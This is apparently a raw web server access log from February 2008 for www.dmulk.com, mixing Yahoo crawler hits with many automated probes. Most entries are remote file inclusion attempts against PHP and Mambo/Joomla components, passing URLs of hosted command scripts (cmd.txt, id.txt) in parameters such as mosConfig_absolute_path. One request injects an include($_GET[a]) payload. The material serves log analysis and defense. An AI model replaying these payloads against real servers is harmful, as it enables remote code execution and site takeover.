195.58.242.138 - - [14/Feb/2008:11:02:27 -0800] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:02:28 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:11:02:28 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:02:33 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:11:02:37 -0800] "GET /logs/access_080201.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:02:38 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.84.2 - - [14/Feb/2008:11:03:18 -0800] "GET /logs/access_080131.log//cart_content.php?cart_isp_root=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:11:03:25 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:11:03:26 -0800] "GET /logs/access.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
211.233.7.68 - - [14/Feb/2008:11:05:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.136 - - [14/Feb/2008:11:07:07 -0800] "GET /logs/access_070925.log HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:11:08:00 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:11:08:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:11:08:02 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:11:08:18 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:11:08:21 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.24.57.99 - - [14/Feb/2008:11:08:57 -0800] "GET /logs/access.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.24.57.99 - - [14/Feb/2008:11:08:57 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:11:09:23 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:11:09:24 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:11:09:25 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.24.57.99 - - [14/Feb/2008:11:09:40 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.24.57.99 - - [14/Feb/2008:11:10:00 -0800] "GET /logs/access_080121.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:11:10:07 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:11:10:30 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:11:10:31 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:11:10:34 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:11:13:54 -0800] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:11:13:55 -0800] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:11:13:55 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:15:07 -0800] "GET /logs/access_080117.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:15:13 -0800] "GET //mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:15:18 -0800] "GET /logs//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.171.48.7 - - [14/Feb/2008:11:16:52 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.148 - - [14/Feb/2008:11:17:21 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:18:43 -0800] "GET /logs/access_080131.log/scanhttp://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:18:43 -0800] "GET /scanhttp://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:18:44 -0800] "GET /logs/scanhttp://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:11:18:46 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:11:18:46 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.141 - - [14/Feb/2008:11:18:47 -0800] "GET /megumi/Necklace/?S=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:11:19:03 -0800] "GET /logs/access.log/list.php?table=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:11:19:03 -0800] "GET /list.php?table=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:11:19:03 -0800] "GET /logs/list.php?table=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:11:19:23 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:20:25 -0800] "GET /logs/access_080201.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:21:23 -0800] "GET /scanhttp://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.236.107 - - [14/Feb/2008:11:21:29 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.236.107 - - [14/Feb/2008:11:23:09 -0800] "GET /logs/access_080121.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.236.107 - - [14/Feb/2008:11:23:09 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.236.107 - - [14/Feb/2008:11:23:09 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:23:48 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [14/Feb/2008:11:25:21 -0800] "GET //appserv/main.php?appserv_root=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.38.50.26 - - [14/Feb/2008:11:25:21 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:26:00 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:26:00 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:26:00 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:11:26:15 -0800] "GET //appserv/main.php?appserv_root=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:11:26:17 -0800] "GET /logs//appserv/main.php?appserv_root=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:26:17 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:26:18 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:26:18 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:26:26 -0800] "GET /logs/access_080131.log/scanhttp://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:26:26 -0800] "GET /scanhttp://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:11:26:26 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:11:26:27 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:26:27 -0800] "GET /logs/scanhttp://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:11:26:27 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.230.57 - - [14/Feb/2008:11:28:39 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:29:07 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:29:32 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:11:30:42 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:31:11 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:31:35 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:31:36 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:31:37 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:32:29 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:11:32:29 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:11:32:29 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:11:32:29 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:32:34 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:32:40 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.35 - - [14/Feb/2008:11:33:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.15 - - [14/Feb/2008:11:33:01 -0800] "GET /bikes/dteel/140CANON/ HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:34:37 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:11:34:52 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:35:09 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:11:35:09 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
84.53.83.254 - - [14/Feb/2008:11:35:34 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
84.53.83.254 - - [14/Feb/2008:11:35:36 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
89.218.85.18 - - [14/Feb/2008:11:35:36 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:11:35:45 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:38:13 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:11:38:13 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.173.254.28 - - [14/Feb/2008:11:38:28 -0800] "GET /logs/access_071225.log///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:11:39:27 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:11:39:27 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:11:39:27 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:40:07 -0800] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
204.213.57.49 - - [14/Feb/2008:11:40:13 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:11:40:13 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:11:40:14 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:11:40:14 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
